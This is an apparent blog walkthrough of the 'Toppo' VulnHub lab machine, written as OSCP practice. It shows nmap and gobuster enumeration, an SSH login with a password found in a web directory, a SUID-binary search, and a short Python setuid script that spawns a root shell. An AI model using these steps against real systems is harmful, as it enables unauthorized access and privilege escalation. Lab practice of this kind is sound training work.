owning Toppo Machine

folder_openOSCP, vulhub
commentNo Comments

This box is in the list of (old) OSCP like machine,  so I am going to try this box.

Require Task:

1. To get root level access

2. To get the flag

****

You can download the machine from here.

****

Information Gathering:

Kali Linux Machine IP: 192.168.56.103

Target Machine IP: 192.168.56.4

Enumerating Services, Versions, Ports

nmap -sC -sV -p- 192.168.56.4  > nmap.log

Since we can see that Apache Web Server is running, therefore, I presume there is there website and we can try robots.txt

No important information was able to find in source code and robots.txt.

I ran gobuster

gobuster dir -u 192.168.56.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt > gobuster.log

Visit the website http://192.168.56.4/admin

We got password : 12345ted123

I guessed the username: ted

We already have IP address of the machine and from nmap result, we know that the machine runs SSH service.

ssh ted@192.168.56.4 
(enter the above password)

12345ted123

Privilege Escalation:

At this point, I check kernel version and it appears to me that it is vulnerable, so what I thought to do was, first I will enumerate whether it has any potential suid binaries which could help me to escalated the privilege. If I can’t find any, then will try the kernel exploit.

Let’s find the binaries  using the following command.. referred link

find / -perm -u=s -type f 2>/dev/null

I am interested with the python part, because I learned a simple code to escalate to root from google.  (apologize for I am not able to recalled from which link).

nano exploit.py 
import os 
os.setuid(0)
os.setgid(0)
os.system("/bin/bash")

python exploit.py

Yes, we got the root privilege.. now let’s get the flag 🙂

Voila!!

Tags: , ,

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed

Menu